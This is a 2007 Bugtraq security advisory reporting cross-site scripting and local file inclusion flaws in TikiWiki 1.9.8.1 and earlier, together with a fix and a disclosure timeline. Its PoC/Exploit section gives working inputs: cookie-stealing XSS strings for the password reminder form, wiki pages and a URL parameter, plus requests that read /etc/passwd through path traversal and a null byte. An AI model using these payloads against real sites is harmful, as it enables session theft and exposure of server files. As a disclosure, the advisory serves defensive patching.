TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
- From: L4teral <l4teral@xxxxxxxxx>
- Date: Thu, 25 Oct 2007 21:42:21 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=FpTR3HNyUShHOMNjm3I3cA2z1p6iPr6VQB1/Tgk/7hE=; b=MdqXQYtQXIoavsKIYxfiUD2n/r4/oYEaW0UqTLAxXnAC7OuJ5rxAU9Uo6GQZkLQh3VTz3JSis3ANEX8i/CXEuDSy0D2ygFUzskqg2KXAbjSVRq4N1T2CUV8AbyuS8HzFRcFG1Xfcp0SFfLoFLzxMAlHojWk9DD/Q+PrIwMEXuvo=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=rfYOTNdmEX7Xk1KvJ7iF0u6KD+sH/n793we4NJfrBBuL/wwgCKfycstdgmM1jD3CiBy96s7B/px6VDMfA/+PEInymxT87Xl7J1F4EBo/3DW1swzitxCZC1lhALcv9AXYShJWfzNhvZkZCfOLx7fvHbcWgVsHkQRc9+sreb1agro=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
======================================================================
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Local File Inclusion
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: TikiWiki
Version: <= 1.9.8.1
Vendor: http://tikiwiki.org
Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.
--------------
Vulnerability:
--------------
XSS:
1. The password reminder page is vulnerable to cross site scripting.
2. Script code can be embedded into wiki-pages.
3. The script db/tiki-db.php is vulnerable to cross site scripting
LFI:
4.
The script db/tiki-db.php is vulnerable to local file inclusion attacks.
5.
The script tiki-imexport_languages.php is vulnerable to local file
inclusion attacks.
------------
PoC/Exploit:
------------
XSS:
1.
enter in the form: <img src="javascript:alert(document.cookie)">
URL: http://localhost/tikiwiki/tiki-remind_password.php
POSTDATA:
username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E
remind=send+me+my+password
2.
create wiki page with:
{img src=javascript:alert(document.cookie) }
3.
http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>
LFI:
4.
register_globals required:
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd
5.
feature lang_use_db(use database for translation) must be activated:
URL: http://localhost/tikiwiki/tiki-imexport_languages.php
POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import
---------
Solution:
---------
update to 1.9.8.2 or above:
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549
---------
Timeline:
---------
23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure